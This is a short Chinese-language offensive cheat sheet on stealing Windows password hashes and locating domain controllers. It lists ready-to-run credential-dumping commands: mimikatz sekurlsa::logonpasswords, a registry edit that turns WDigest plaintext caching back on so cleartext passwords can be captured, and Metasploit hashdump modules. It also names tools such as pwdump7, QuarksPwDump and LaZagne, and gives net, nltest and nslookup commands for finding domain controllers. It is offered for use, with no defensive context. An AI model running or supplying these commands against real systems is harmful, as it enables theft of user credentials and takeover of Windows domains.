获取windows 用户hash
因为系统不同 以及各自的策略不同 ,因此需要多个工具配合使用
mimikatz.exe
该工具kali自带 拷贝出来直接用
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"
另外,需要注意的是,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
pwdump7
下载地址
https://www.tarasco.org/security/pwdump_7/
getpass
直接运行即可
QuarksPwDump
https://www.webshell.cc/4625.html
-h 查看用法
–dump-hash-local –with-history
lazagne
挺强大的工具 🐂🍺
项目地址 https://github.com/AlessandroZ/LaZagne
支持的模块
使用 或者直接下载exe 亦或者自己编译
metasploit
获取到shell之后 执行
run windows/gather/smart_hashdump
run hashdump
域控查找
-
当域控 与dns 为同一服务器时 dns 服务器地址为 域控地址
-
nslookup -type=SRV _ldap._tcp
-
net group “Domain Controllers” /domain
-
nltest /DCLIST:域名
-
net time /domain
-
set logon 列出以logon开头的变量
-
net view /domain:域